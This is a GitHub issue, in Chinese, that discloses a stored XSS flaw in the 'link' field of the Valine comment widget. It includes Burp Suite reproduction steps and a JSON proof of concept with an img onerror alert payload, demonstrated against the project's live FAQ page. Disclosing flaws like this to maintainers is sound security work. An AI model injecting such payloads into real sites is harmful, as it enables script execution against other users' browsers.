评论链接存在XSS漏洞

### 评论链接存在XSS漏洞
如果您想报告错误，请提供以下信息 If you want to report a bug, please provide the following information:

- [ ] 可复现问题的步骤 The steps to reproduce.
使用burpsuite提交评论并抓包
![image](https://user-images.githubusercontent.com/45556496/120676051-3c5a8280-c4c8-11eb-82a2-41d9df0a9868.png)
poc:
```
{"comment":"1\n","nick":"test","mail":"test@163.com","link":"\" ></a><img src=x onerror=alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/faq.html","QQAvatar":"","ip":"2406:da14:727:6700:2746:774b:2b87:6dbe","insertedAt":{"__type":"Date","iso":"2021-06-03T15:59:08.981Z"},"ACL":{"*":{"read":true}}}
```
核心`payload`为`comment`内容：
`\" ></a><img src=x onerror=alert(1)>`
其效果为：
https://valine.js.org/faq.html
![image](https://user-images.githubusercontent.com/45556496/120676178-5ac07e00-c4c8-11eb-8771-2e43caf3c193.png)


- [ ] 可复现问题的网页地址 A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible.
https://valine.js.org/faq.html  记得删除评论
- [ ] 受影响的Valine版本、操作系统，以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

评论链接存在XSS漏洞 #363